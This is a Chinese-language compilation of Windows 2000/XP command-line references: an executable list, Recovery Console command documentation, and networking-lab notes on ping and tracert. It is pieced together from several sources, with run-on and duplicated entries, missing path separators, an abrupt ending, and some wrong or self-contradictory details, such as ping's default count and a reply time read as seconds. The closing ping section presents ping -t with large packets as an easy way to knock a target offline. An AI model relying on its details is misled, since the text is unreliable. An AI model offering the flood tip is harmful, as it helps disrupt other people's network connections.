cmd常用命令大全 cmd运行命令cmd常用命令大全
2K和XP下的CMD命令
accwiz.exe > 辅助工具向导
acsetups.exe > acs setup dcom server executable
actmovie.exe > 直接显示安装工具
append.exe > 允许程序打开制定目录中的数据
arp.exe > 显示和更改计算机的ip与硬件物理地址的对应列表
at.exe > 计划运行任务
atmadm.exe > 调用管理器统计
attrib.exe > 显示和更改文件和文件夹属性
autochk.exe > 检测修复文件系统
autoconv.exe > 在启动过程中自动转化系统
autofmt.exe > 在启动过程中格式化进程
autolfn.exe > 使用长文件名格式
bootok.exe > boot acceptance application for registry bootvrfy.exe > 通报启动成功
cacls.exe > 显示和编辑acl
calc.exe > 计算器
cdplayer.exe > cd播放器
change.exe > 与终端服务器相关的查询
charmap.exe > 字符映射表
chglogon.exe > 启动或停用会话记录
chgport.exe > 改变端口(终端服务)
chgusr.exe > 改变用户(终端服务)
chkdsk.exe > 磁盘检测程序
chkntfs.exe > 磁盘检测程序
cidaemon.exe > 组成ci文档服务
cipher.exe > 在ntfs上显示或改变加密的文件或目录
cisvc.exe > 索引内容
ckcnv.exe > 变换cookie
cleanmgr.exe > 磁盘清理
cliconfg.exe > sql客户网络工具
clipbrd.exe > 剪贴簿查看器
clipsrv.exe > 运行clipboard服务
clspack.exe > 建立系统文件列表清单
cluster.exe > 显示域的集群
_cmd_.exe > 没什么好说的!
cmdl32.exe > 自动下载连接管理
cmmgr32.exe > 连接管理器
cmmon32.exe > 连接管理器监视
cmstp.exe > 连接管理器配置文件安装程序
comclust.exe > 集群
comp.exe > 比较两个文件和文件集的内容*compact.exe > 显示或改变ntfs分区上文件的压缩状态conime.exe > ime控制台
control.exe > 控制面板
convert.exe > 转换文件系统到ntfs
convlog.exe > 转换iis日志文件格式到ncsa格式cprofile.exe > 转换显示模式
cscript.exe > 较本宿主版本
csrss.exe > 客户服务器runtime进程
csvde.exe > 日至格式转换程序
dbgtrace.exe > 和terminal server相关
dcomcnfg.exe > dcom配置属性
dcphelp.exe > ?
dcpromo.exe > ad安装向导
ddeshare.exe > dde共享
ddmprxy.exe >
debug.exe > 就是debug啦!
dfrgfat.exe > fat分区磁盘碎片整理程序
dfrgntfs.exe > ntfs分区磁盘碎片整理程序
dfs_cmd_.exe > 配置一个dfs树
dfsinit.exe > 分布式文件系统初始化
dfssvc.exe > 分布式文件系统服务器
diantz.exe > 制作cab文件
diskperf.exe > 磁盘性能计数器
dllhost.exe > 所有com+应用软件的主进程
dllhst3g.exe >
dmadmin.exe > 磁盘管理服务
dmremote.exe > 磁盘管理服务的一部分
dns.exe > dns applications dns
doskey.exe > 命令行创建宏
dosx.exe > dos扩展
dplaysvr.exe > 直接运行帮助
drwatson.exe > 华生医生错误检测
drwtsn32.exe > 华生医生显示和配置管理
dtcsetup.exe > installs mdtc
dvdplay.exe > dvd播放
dxdiag.exe > direct-x诊断工具
edlin.exe > 命令行的文本编辑器(历史悠久啊!)edlin.exe > 命令行的文本编辑器(历史悠久啊!)esentutl.exe > ms数据库工具
eudcedit.exe > type造字程序
eventvwr.exe > 事件查看器
evnt_cmd_.exe > event to trap translator; configuration tool evntwin.exe > event to trap translator setup
exe2bin.exe > 转换exe文件到二进制
expand.exe > 解压缩
extrac32.exe > 解cab工具
fastopen.exe > 快速访问在内存中的硬盘文件
faxcover.exe > 传真封面编辑
faxqueue.exe > 显示传真队列
faxsend.exe > 发送传真向导
faxsvc.exe > 启动传真服务
fc.exe > 比较两个文件的不同
find.exe > 查找文件中的文本行
findstr.exe > 查找文件中的行
finger.exe > 一个用户并显示出统计结果
fixmapi.exe > 修复mapi文件
flattemp.exe > 允许或者禁用临时文件目录
fontview.exe > 显示字体文件中的字体
forcedos.exe > forces a file to start in dos mode. 强制文件在dos模式下运行
freecell.exe > popular windows game 空当接龙
ftp.exe > file transfer protocol used to transfer files over a networ k conne
ction 就是ftp了
gdi.exe > graphic device interface 图形界面驱动
grovel.exe >
grpconv.exe > program manager group convertor 转换程序管理员组
help.exe > displays help for windows 2000 commands 显示帮助hostname.exe > display hostname for machine. 显示机器的hostname
ie4uinit.exe > ie5 user install tool ie5用户安装工具
ieshwiz.exe > customize folder wizard 自定义文件夹向导
iexpress.exe > create and setup packages for install 穿件安装包iisreset.exe > restart iis admin service 重启iis服务
internat.exe > keyboard language indicator applet 键盘语言指示器ipconfig.exe > windows 2000 ip configuration. 察看ip配置
ipsecmon.exe > ip security monitor ip安全监视器
ipxroute.exe > ipx routing and source routing control program ipx路由和源路由
控制程序
irftp.exe > setup ftp for wireless communication 无线连接
ismserv.exe > intersite messaging service 安装或者删除
service control manage
r中的服务
jdbgmgr.exe > microsoft debugger for java 4 java4的调试器
jetconv.exe > convert a jet engine database 转换jet engine数据库jetpack.exe > compact jet database. 压缩jet数据库
jview.exe > command-line loader for java java的命令行装载者
krnl386.exe > core component for windows 2000 2000的核心组件
label.exe > change label for drives 改变驱动器的卷标
lcwiz.exe > license compliance wizard for local or remote systems. 许可证符合
向导
ldifde.exe > ldif cmd line manager ldif目录交换命令行管理
licmgr.exe > terminal server license manager 终端服务许可协议管理lights.exe > display connection status lights 显示连接状况
llsmgr.exe > windows 2000 license manager 2000许可协议管理
llssrv.exe > start the license server 启动许可协议服务器
lnkstub.exe >
locator.exe > rpc locator 远程定位
lodctr.exe > load perfmon counters 调用性能计数
logoff.exe > log current user off. 注销用户
lpq.exe > displays status of a remote lpd queue 显示远端的lpd打印队列的状态,
显示被送到基于unix的服务器的打印任务
lpr.exe > send a print job to a network printer. 重定向打印任务到网络中的打印
机。通常用于unix客户打印机将打印任务发送给连接了打印设备的nt的打印机服务器。
lsass.exe > lsa executable and server dll 运行lsa和server的dll lserver.exe > specifies the new dns domain for the default server 指定默认se
rver新的dns域
os2.exe > an os/2 warp server (os2 /o) os/2
os2srv.exe > an os/2 warp server os/2
os2ss.exe > an os/2 warp server os/2
osk.exe > on screen keyboard 屏幕键盘
packager.exe > windows 2000 packager manager 对象包装程序
pathping.exe > combination of ping and tracert 包含ping和tracert的程序
pax.exe > is a posix program and path names used as arguments must be specif
ied in posix format. use "//c/users/default" instead of "c:usersdefau lt."
启动便携式存档互换 (pax) 实用程序
pentnt.exe > used to check the pentium for the floating point divisio n error
. 检查pentium的浮点错误
perfmon.exe > starts windows performance monitor 性能监视器
ping.exe > packet internet groper 验证与远程计算机的连接
posix.exe > used for backward compatibility with unix 用于兼容unix print.exe > cmd line used to print files 打印文本文件或显示打印队列的内容。
progman.exe > program manager 程序管理器
proquota.exe > profile quota program
psxss.exe > posix subsystem application posix子系统应用程序qappsrv.exe > displays the available application terminal servers on the net
work
在网络上显示终端服务器可用的程序
qprocess.exe > display information about processes local or remote 在本地或远
程显示进程的信息(需终端服务)
query.exe > query termserver user process and sessions 查询进程和对
话
quser.exe > display information about a user logged on 显示用户登陆的信息(需
终端服务)
qwinsta.exe > display information about terminal sessions. 显示终端服务的信息
rasadmin.exe > start the remote access admin service 启动远程访问服
务
rasautou.exe > creates a ras connection 建立一个ras连接
rasdial.exe > dial a connection 拨号连接
ras.exe > starts a ras connection 运行ras连接
rcp.exe > copies a file from and to a rcp service. 在 windows 2000 计算机和运
行远程外壳端口监控程序 rshd 的系统之间复制文件
rdpclip.exe > rdpclip allows you to copy and paste files between a te rminal
session and client console session. 再终端和本地复制和粘贴文件recover.exe > recovers readable information from a bad or defective d isk 从坏
的或有缺陷的磁盘中恢复可读取的信息。
redir.exe > starts the redirector service 运行重定向服务
regedt32.exe > 32-bit register service 32位注册服务
regini.exe > modify registry permissions from within a script 用脚本修改注册
许可
register.exe > register a program so it can have special execution ch
aracter
istics. 注册包含特殊运行字符的程序
regsvc.exe >
regsvr32.exe > registers and unregister's dll's. as to how and where it regi
ster's them i dont know. 注册和反注册dll
regtrace.exe > options to tune debug options for applications failing to dum
p trace statements
trace 设置
regwiz.exe > registration wizard 注册向导
remrras.exe >
replace.exe > replace files 用源目录中的同名文件替换目标目录中的文件。
reset.exe > reset an active section 重置活动部分
rexec.exe > runs commands on remote hosts running the rexec service. 在运行
rexec 服务的远程计算机上运行命令。rexec 命令在执行指定命令前,验证远程计算机
上的用户名,只有安装了 tcp/ip 协议后才可以使用该命令。
risetup.exe > starts the remote installation service wizard. 运行远程安装向导
服务
route.exe > display or edit the current routing tables. 控制网络路由表
routemon.exe > no longer supported 不再支持了!
router.exe > router software that runs either on a dedicated dos or o n an os
/2 system. route软件在 dos或者是os/2系统
rsh.exe > runs commands on remote hosts running the rsh service 在运行 rsh 服
务的远程计算机上运行命令
rsm.exe > mounts and configures remote system media 配置远程系统媒体rsnotify.exe > remote storage notification recall 远程存储通知回显rsvp.exe > resource reservation protocol 源预约协议
runas.exe > run a program as another user 允许用户用其他权限运行指定的工具和
程序
rundll32.exe > launches a 32-bit dll program 启动32位dll程序runonce.exe > causes a program to run during startup 运行程序再开始菜单中
rwinsta.exe > reset the session subsystem hardware and software to kn own ini
tial values 重置会话子系统硬件和软件到最初的值
savedump.exe > does not write to e:winntuser.dmp 不写入user.dmp中scardsvr.exe > smart card resource management server 子能卡资源管理服务器
schupgr.exe > it will read the schema update files (.ldf files) and u pgrade
the schema. (part of adsi) 读取计划更新文件和更新计划
secedit.exe > starts security editor help 自动安全性配置管理services.exe > controls all the services 控制所有服务
sethc.exe > set high contrast - changes colours and display mode logo ff to s
et it back to normal 设置高对比
setreg.exe > shows the software publishing state key values 显示软件发布的国
家语言
setup.exe > gui box prompts you to goto control panel to configure sy stem co
mponents 安装程序(转到控制面板)
setver.exe > set version for files 设置 ms-dos 子系统向程序报告
的 ms-dos 版本
号
sfc.exe > system file checker test and check system files for integri ty 系统
文件检查
sfmprint.exe > print services for macintosh 打印macintosh服务sfmpsexe.exe >
sfmsvc.exe >
shadow.exe > monitor another terminal services session. 监控另外一台中端服务
器会话
share.exe > windows 2000 和 ms-dos 子系统不使用该命令。接受该命令只是为了与
ms-dos 文件兼容
shmgrate.exe >
shrpubw.exe > create and share folders 建立和共享文件夹
sigverif.exe > file signature verification 文件签名验证
skeys.exe > serial keys utility 序列号制作工具
smlogsvc.exe > performance logs and alerts 性能日志和警报
smss.exe >
sndrec32.exe > starts the windows sound recorder 录音机
sndvol32.exe > display the current volume information 显示声音控制信息
snmp.exe > simple network management protocol used for network mangem ent 简单
网络管理协议
snmptrap.exe > utility used with snmp snmp工具
sol.exe > windows solitaire game 纸牌
sort.exe > compares files and folders 读取输入、排序数据并将结果写到屏幕、文
件和其他设备上
SPOOLSV.EXE > Part of the spooler service for printing 打印池服务的一部分
sprestrt.exe >
srvmgr.exe > Starts the Windows Server Manager 服务器管理器
stimon.exe > WDM StillImage- > Monitor
stisvc.exe > WDM StillImage- > Service
subst.exe > Associates a path with a drive letter 将路径与驱动器盘符关联
svchost.exe > Svchost.exe is a generic host process name for services that a
re run from dynamic-link libraries (DLLs). DLL得主进程
syncapp.exe > Creates Windows Briefcase. 创建Windows文件包
sysedit.exe > Opens Editor for 4 system files 系统配置编辑器
syskey.exe > Encrypt and secure system database NT账号数据库按群工具sysocmgr.exe > Windows 2000 Setup 2000安装程序
systray.exe > Starts the systray in the lower right corner. 在低权限运行syst
ray
macfile.exe > Used for managing MACFILES 管理MACFILES
magnify.exe > Used to magnify the current screen 放大镜
makecab.exe > MS Cabinet Maker 制作CAB文件
mdm.exe > Machine Debug Manager 机器调试管理
mem.exe > Display current Memory stats 显示内存状态
migpwd.exe > Migrate passwords. 迁移密码
mmc.exe > Microsoft Management Console 控制台
mnmsrvc.exe > Netmeeting Remote Desktop Sharing NetMeeting远程桌面共享
mobsync.exe > Manage Synchronization. 同步目录管理器
mountvol.exe > Creates, deletes, or lists a volume mount point. 创建、删除或
列出卷的装入点。
mplay32.exe > MS Media Player 媒体播放器
mpnotify.exe > Multiple Provider Notification application 多提供者通知应用程
序
mq1sync.exe >
mqbkup.exe > MS Message Queue Backup and Restore Utility 信息队列备份和恢复工
具
mqexchng.exe > MSMQ Exchange Connector Setup 信息队列交换连接设置mqmig.exe > MSMQ Migration Utility 信息队列迁移工具
mqsvc.exe > ?
mrinfo.exe > Multicast routing using SNMP 使用SNMP多点传送路由mscdexnt.exe > Installs MSCD (MS CD Extensions) 安装MSCD
msdtc.exe > Dynamic Transaction Controller Console 动态事务处理控制台
msg.exe > Send a message to a user local or remote. 发送消息到本地或远程客户
mshta.exe > HTML Application HOST HTML应用程序主机
msiexec.exe > Starts Windows Installer Program 开始Windows安装程序mspaint.exe > Microsoft Paint 画板
msswchx.exe >
mstask.exe > Task Schedule Program 任务计划表程序
mstinit.exe > Task scheduler setup 任务计划表安装
narrator.exe > Program will allow you to have a narrator for reading. Micros
oft讲述人
nbtstat.exe > Displays protocol stats and current TCP/IP connections using N
BT 使用 NBT(TCP/IP 上的 NetBIOS)显示协议统计和当前 TCP/IP 连接。nddeapir.exe > NDDE API Server side NDDE API服务器端
net.exe > Net Utility 详细用法看/?
net1.exe > Net Utility updated version from MS Net的升级版
netdde.exe > Network DDE will install itself into the background 安装自己到后
台
netsh.exe > Creates a shell for network information 用于配置和监
控 Windows 2
000 命令行脚本接口。
netstat.exe > Displays current connections. 显示协议统计和当前
的 TCP/IP 网络
连接。
nlsfunc.exe > Loads country-specific information 加载特定国家(地区)的信息。
Windows 2000 和 MS-DOS 子系统不使用该命令。接受该命令只是为了
与 MS-DOS 文件兼
容。
notepad.exe > Opens Windows 2000 Notepad 记事本
nslookup.exe > Displays information for DNS 该诊断工具显示来自域名系统 (DNS)
名称服务器的信息。
ntbackup.exe > Opens the NT Backup Utility 备份和故障修复工具
ntbooks.exe > Starts Windows Help Utility 帮助
ntdsutil.exe > Performs DB maintenance of the ADSI 完成ADSI的DB的维护
ntfrs.exe > NT File Replication Service NT文件复制服务
ntfrsupg.exe >
ntkrnlpa.exe > Kernel patch 核心补丁
ntoskrnl.exe > Core NT Kernel KT的核心
ntsd.exe >
ntvdm.exe > Simulates a 16-bit Windows environment 模拟16位Windows环境
nw16.exe > Netware Redirector NetWare转向器
nwscript.exe > runs netware scripts 运行Netware脚本
odbcad32.exe > ODBC 32-bit Administrator 32位ODBC管理
odbcconf.exe > Configure ODBC driver's and data source's from command line 命
令行配置ODBC驱动和数据源
taskman.exe > Task Manager 任务管理器
taskmgr.exe > Starts the Windows 2000 Task Manager 任务管理器tcmsetup.exe > telephony client wizard 电话服务客户安装
tcpsvcs.exe > TCP Services TCP服务
.exe > Telnet Utility used to connect to Telnet Server
termsrv.exe > Terminal Server 终端服务
tftp.exe > Trivial FTP 将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行
TFTP 服务的远程计算机传输文件
tftpd.exe > Trivial FTP Daemon
themes.exe > Change Windows Themes 桌面主题
tlntadmn.exe > Telnet Server Administrator Telnet服务管理
tlntsess.exe > Display the current Telnet Sessions 显示目前的Telnet 会话
tlntsvr.exe > Start the Telnet Server 开始Telnet服务
tracert.exe > Trace a route to display paths 该诊断实用程序将包含不同生存时间
(TTL) 值的 Internet 控制消息协议 (ICMP) 回显数据包发送到目标,以决定到达目标
采用的路由
tsadmin.exe > Terminal Server Administrator 终端服务管理器
tscon.exe > Attaches a user session to a terminal session. 粘贴用户会话到终端
对话
tsdiscon.exe > Disconnect a user from a terminal session 断开终端服务的用户
tskill.exe > Kill a Terminal server process 杀掉终端服务
tsprof.exe > Used with Terminal Server to query results. 用终端服务得
出查询结
果
tsshutdn.exe > Shutdown the system 关闭系统
unlodctr.exe > Part of performance monitoring 性能监视器的一部分
upg351db.exe > Upgrade a jet database 升级Jet数据库
ups.exe > UPS service UPS服务
user.exe > Core Windows Service Windows核心服务
userinit.exe > Part of the winlogon process Winlogon进程的一部分usrmgr.exe > Start the windows user manager for domains 域用户管理器utilman.exe > This tool enables an administrator to designate which c omputers automatically open accessibility tools when Windows 2000 sta rts. 指定2000启动时自动打开那台机器
verifier.exe > Driver Verifier Manager Driver Verifier Manager vwipxspx.exe > Loads IPX/SPX VDM 调用IPX/SPX VDM
w32tm.exe > Windows Time Server 时间服务器
wextract.exe > Used to extract windows files 解压缩Windows文件winchat.exe > Opens Windows Chat 打开Windows聊天
winhlp32.exe > Starts the Windows Help System 运行帮助系统
winlogon.exe > Used as part of the logon process. Logon进程的一部分winmine.exe > windows Game 挖地雷
winmsd.exe > Windows Diagnostic utility 系统信息
wins.exe > Wins Service Wins服务
winspool.exe > Print Routing 打印路由
winver.exe > Displays the current version of Windows 显示Windows版
本
wizmgr.exe > Starts Windows Administration Wizards Windows管理向导wjview.exe > Command line loader for Java 命令行调用Java wowdeb.exe > . For starters, the 32-bit APIs require that the WOWDEB. EXE tas
k runs in the target debugee's VM 启动时,32位API需要
wowexec.exe > For running Windows over Windows Applications 在Windows 应用程序
上运行Windows
wpnpinst.exe > ?
write.exe > Starts MS Write Program 写字板
wscript.exe > Windows Scripting Utility 脚本工具
wupdmgr.exe > Starts the Windows update Wizard (Internet) 运行Windows 升级向导
xcopy.exe > 复制文件和目录,包括子目录
Win XP控制台命令详解
Win XP(包括2000)的控制台命令是在系统出现一些意外情况下的一种非常有效的
诊断和测试以及恢复系统功能的工具。小编的确一直都想把这方面的命令做个总
结,这
次辛苦老范给我们整理了这份实用的秘笈。
第一部分:文件和目录操作命令
Attrib Batch Chdir (Cd) Copy Delete (Del) Expand Mkdir (md) Rmdir (Rd) Type
More
第二部分:系统和磁盘操作命令
Bootcfg hkdsk Diskpart Fixboot Fixmbr
format Map
第三部分:辅助操作和特殊功能命令
Cls Disable Enable Exit Help commandname Listsvc Logon Net use
Set Systemroot
Attrib
更改单个文件或目录的属性。该命令设置或删除指派给文件或目录的只读、系统、
存档、隐藏以及压缩属性。
含有下列参数的 attrib 命令仅当使用故障恢复控制台时才可用。含有不同参数的
attrib
命令可在命令提示符中使用。
attrib [ +r|-r] [ +s|-s] [ +h|-h] [ +c|-c] [ [ drive:] [ path] filena me]
参数
+r 设置只读属性。
-r 清除只读属性。
+s 设置系统属性。
-s 清除系统属性。
+h 设置隐藏属性。
-h 清除隐藏属性。
+c 设置压缩属性。
-c 清除压缩属性。
[ [ drive:] [ path] filename]
指定要处理的目录或文件的位置和名称。可以一次只更改一个文件,也可以更改整
个目录。
注意:可以用一个命令更改一个文件或目录的多个属性。
Batch
执行在文本文件中指定的命令。batch 命令仅在使用故障恢复控制台时才可用。故
障恢复控制台可以从安装 CD 中启动。
batch input_file [ output_file]
参数
input_file
指定包含要执行的命令列表的文本文件。Input_file 可以由驱动器号和冒号、目录
名、文件名或它们的组合构成。
output_file
如果指定,则在命名文件中存储命令输出。如果没有指定,输出将显示在屏幕上。
范例
下例将执行批处理文件 C:JobsFind.txt 并将输出存储在文件
C:JobsResults.txt 中:
batch c:jobsfind.txt c:jobs esults.txt
注意:批处理文件不能包含嵌套的 batch 命令。
Chdir(Cd)
显示当前目录的名称,或更改当前的文件夹。
含有下列参数的 chdir 命令仅在使用故障恢复控制台时才可用。可在命令提示符下
使用带有不同参数的 chdir 命令。
chdir [drive:] [path] [ ..]
或者
cd [drive:] [ path] [ ..]
参数无
如果不带任何参数,chdir 将显示当前驱动器和文件夹的名称。只与驱动器号一起
使用(例如 cd C:),chdir 将显示指定驱动器上的当前目录。
[ drive:] [ path]
指定要改到的驱动器(如果不是当前驱动器)和目录。
[ ..]
指明要改到父文件夹。在 chdir 和两个句点之间插入一个空格。
注意
Chdir 将空格视作分隔符。用引号将包含空格的目录名扩起来。例如:
cd "driver cache"
Chdir 只适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地
安装源。
Copy
将单个文件复制到其他位置。含有下列参数的 copy 命令仅在使用故障恢复控制台
时才可用。
可在命令提示符下使用带不同参数的 copy 命令。
copy source [ destination]
参数
source
指定要被复制的文件的位置和名称。Source 可由驱动器号和冒号、目录名、文件名
或组合所组成。
destination
指定要复制到其中的文件或文件集的位置和名称。Destination 可以由驱动器号和
冒号、文件夹名、文件名及组合而组成。
注意
源可以是可移动媒体、当前 Windows 安装的系统目录中的任何目录、驱动器的根目录、
本地安装源或 Cmdcons 目录。
目标可以是除可移动媒体以外的任何与源相同的位置。如果没有指定目标,则默认为当
前目录。
Windows 安装 CD 中的压缩文件在复制过程中解压缩。
Copy 不支持通配符。
Delete(Del)
删除单个文件。含有下列参数的 delete 或 del 命令仅在使用故障恢复控制台时才
可用。可在命令提示符下使用带有不同参数的 delete 或 del 命令。
delete [ drive:] [ path] filename
或者
del [ drive:] [ path] filename
参数
[ drive:] [ path] filename指定要删除的文件的位置和名称。
注意
Delete 只适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本
地安装源。
Dir
显示目录中的文件和子目录列表。含有下列参数的 dir 命令仅在使用故障恢复控制
台时才可用。可在命令提示符下使用带有不同参数的 dir 命令。
dir [ drive:] [ path] [ filename]
参数
[ drive:] [ path]
指定要查看列表的驱动器和目录。
[ filename]
指定要查看列表的特定文件或一组文件。可以使用多个文件名。文件名可以用空格
、逗号或分号隔开。可以在 filename 参数中使用通配符(? 和 *)显示一组文件。
Dir 还列出磁盘的卷标和序列号,以及所列文件的数目,累计大小和磁盘上剩余的
可用空间(以字节计)。对于每个文件和子目录而言,dir 列出文件的扩展名、文件字
节数、文件的最后修改日期和时间以及下列文件属性(如果可用):
缩写属性
d 目录
h 隐藏文件
s 系统文件
e 加密
r 只读
a 存档文件
c 已压缩
p 重新分析点
注意:
Dir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本
地安装源。
Expand
从压缩文件中提取文件。通过该命令可从 .cab 文件或压缩文件中提取驱动程序文
件。
含有下列参数的 expand 命令仅在使用故障恢复控制台时才可用。可在命令提示符
下使用带有不同参数的 expand 命令。
expand source [ /F:filespec}] [ destination] [ /d] [ /y]
参数
source
指定要展开的文件。如果源文件只包含一个文件,请使用该选项。source 可由驱动
器号和冒号、目录名、文件名或组合所组成。不能使用通配符。
/f:size
如果源文件包含多个文件,指定要提取的文件的名称。可以对要提取的文件使用通
配符。
destination
指定提取文件或每个单独文件的目标目录和(或)文件名。
/d
列出 CAB 文件中包含的文件而不展开或提取。
/y
在展开或提取文件时不出现覆盖提示。
范例
下例将从安装 CD 上的驱动程序 CAB 文件中提取 Msgame.sys 文件并将其复制到
C:WindowsSystemDrivers:
expand d:i386driver.cabf:msgame.sys c:windowssystemdrivers
下例将展开压缩文件 Access.cp_:
expand d:i386acces.cp_c:windowssystem32access.cpl
下例将列出安装 CD 上的驱动程序 CAB 文件中的所有文件。
expand /d d:i386driver.cab
要点
驱动程序 CAB 文件包含成千上万的文件,其中包括由 Windows 提供的大部分驱动程序
。将所有文件从 CAB 文件展开到硬盘上需要花较长的时间和大量的磁盘空间。建议仅
从该文件中提取需要的文件。
注意
如果没有指定目标,文件将被复制到当前目录。
不能将软盘驱动器或 CD-ROM 等可移动媒体指定为目标。
Mkdir(md)
创建目录或子目录。含有下列参数的 mkdir 命令仅在使用故障恢复控制台时可用。
可在命令提示符下使用带不同参数的 mkdir 命令。
mkdir [ drive:] path
或者
md [ drive:] path
参数
drive:
指定要创建新目录的驱动器。
path
指定新目录的名称和位置。不能使用通配符。
注意
Mkdir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地
安装源。
Rename(Ren)
更改单个文件的名称。含有下列参数的 rename 命令仅在使用故障恢复控制台时可
用。可在命令提示符下使用带不同参数的 rename 命令。
rename [ drive:] [ path] filename1 filename2
或者
ren [ drive:] [ path] filename1 filename2
参数
[ drive:] [ path] filename1
指定要重新命名的文件的位置和名称。不能使用通配符。
filename2
为文件指定新的名称。重新命名文件时不能指定新的驱动器或路径。
Rmdir(Rd)
删除目录。含有下列参数的 rmdir 命令仅在使用故障恢复控制台时可用。可在命令
提示符下使用带不同参数的 mdir 命令。
rmdir [ drive:] path
或者
rd [ drive:] path
参数
[ drive:] path
指定要删除的目录的位置和名称。不能使用通配符。
目录必须为空否则命令失败。
Rmdir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地
安装源。
Type
显示文本文件的内容。使用 type 或 more 命令查看文本文件而不修改文件。含有
下述参数的 type 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同
参数的 type 命令。
type [ drive:] [ path] filename
或者
more [ drive:] [ path] filename
参数
[ drive:] path] filename
指定要查看的文件的位置和名称。
如果使用 NTFS 驱动器而且文件名包含空格,则必须用引号(")将文件名引起来。
More
显示文本文件的内容。使用 more 或 type 命令查看文本文件而不修改文件。含有
下列参数的 more 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同
参数的 more 命令。
more [ drive:] [ path] filename
或者
type [ drive:] [ path] filename
winver 检查Windows版本 wmimgmt.msc 打开Windows管理体系结构(wmi) wupdmgr Windows更新程序 wscript Windows脚本宿主设置 write 写字板 winmsd 系统信息 wiaacmgr 扫描仪和照相机向导 winchat xp自带局域网聊天 mem.exe 显示内存使用情况 msconfig.exe 系统配置实用程序 mplayer2 简易widnows media player mspaint 画图板 mstsc 远程桌面连接 mplayer2 媒体播放机 magnify 放大镜实用程序 mmc 打开控制台 mobsync 同步命令 dxdiag 检查directx信息 drwtsn32 系统医生 devmgmt.msc 设备管理器 dfrg.msc 磁盘碎片整理程序 diskmgmt.msc 磁盘管理实用程序 dcomcnfg 打开系统组件服务 ddeshare 打开dde共享设置
dvdplay dvd播放器 net stop messenger 停止信使服务 net start messenger 开始信使服务 notepad 打开记事本 nslookup 网络管理的工具向导 ntbackup 系统备份和还原 narrator 屏幕“讲述人” ntmsmgr.msc 移动存储管理器 ntmsoprq.msc 移动存储管理员操作请求 netstat -an (tc)命令检查接口 syncapp 创建一个公文包 sysedit 系统配置编辑器 sigverif 文件签名验证程序 sndrec32 录音机 shrpubw 创建共享文件夹 secpol.msc 本地安全策略 syskey 系统加密,一旦加密就不能解开,保护Windows xp系统的双重密码services.msc 本地服务设置 sndvol32 音量控制程序 sfc.exe 系统文件检查器 sfc /scannow windows文件保护 tsshutdn 60秒倒计时关机命令 tourstart xp简介(安装完成后出现的漫游xp程序) taskmgr 任务管理器 eventvwr 事件查看器
实验一常用网络命令(测试工具) 一、介绍基本网络测试工具 1. ping命令 2. tracert命令 3. netstat命令 4. ipconfig命令 1.ping命令(Packet Internet Groper,因特网包探索器)原理:利用网络上主机IP地址的唯一性,给目的IP地址发送一个数据包,再要求对方返回一个同样大小的数据包来确定两台主机是否连通,时延是多少。 利用ping命令可以排查网卡、Modem、电缆和路由器等存在的故障。 ping命令只有在安装了TCP/IP协议后才可以使用。运行ping命令后,在窗口中会返回对方客户机的IP地址和表明ping通对方的时间,如果出现信息“Reply from ...”,则说明能与对方连通;如果出现信息“Request timeout ...”,说明不能与对方连通。 缺省设置时,每发出一个ping命令就向对方发送4个网间控制报文协议ICMP的回送请求,如果网络正常,发送方将得到4个回送的应答。 ping命令发出后得到以毫秒或者毫微秒为单位的应答时间,时间越短表示数据路由越畅通;反之则说明网络连接不够畅通。 ping命令显示的TTL(Time To Live:存在时间)值,可以推算出数据包通过了多少个路由器。如果ping不成功,故障可能出现在以下几个方面:网线、网卡、IP地址。 2.tracert命令 tracert命令用来显示数据包到达目标主机所经过的路径,并显示到达每个节点的时间。因此,tracert也称为跟踪路由命令。 tracert命令通过递增“存在时间(TTL)”的值将“ICMP 回送请求”报文发送给目标主机,从而确定到达目标主机的路径。所显示的路径是源主机与目标主机间路径上的路由器
windows XP cmd命令大全 一,ping 它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧,在DOS窗口中键入:ping /? 回车,。所示的帮助画面。在此,我们只掌握一些基本的很有用的参数就可以了(下同)。 -t 表示将不间断向目标IP发送数据包,直到我们强迫其停止。试想,如果你使用100M 的宽带接入,而目标IP是56K的小猫,那么要不了多久,目标IP就因为承受不了这么多的数据而掉线,呵呵,一次攻击就这么简单的实现了。 -l 定义发送数据包的大小,默认为32字节,我们利用它可以最大定义到65500字节。结合上面介绍的-t参数一起使用,会有更好的效果哦。 -n 定义向目标IP发送数据包的次数,默认为3次。如果网络速度比较慢,3次对我们来说也浪费了不少时间,因为现在我们的目的仅仅是判断目标IP是否存在,那么就定义为一次吧。 说明一下,如果-t 参数和 -n参数一起使用,ping命令就以放在后面的参数为标准,比如"ping IP -t -n 3",虽然使用了-t参数,但并不是一直ping下去,而是只ping 3次。另外,ping命令不一定非得ping IP,也可以直接ping主机域名,这样就可以得到主机的IP。 下面我们举个例子来说明一下具体用法。 这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒,从这里可以判断网络连接速度的大小。从TTL的返回值可以初步判断被ping主机的操作系统,之所以说"初步判断"是因为这个值是可以修改的。这里TTL=32表示操作系统可能是win98。 (小知识:如果TTL=128,则表示目标主机可能是Win2000;如果TTL=250,则目标主机可能是Unix) 至于利用ping命令可以快速查找局域网故障,可以快速搜索最快的QQ服务器,可以对
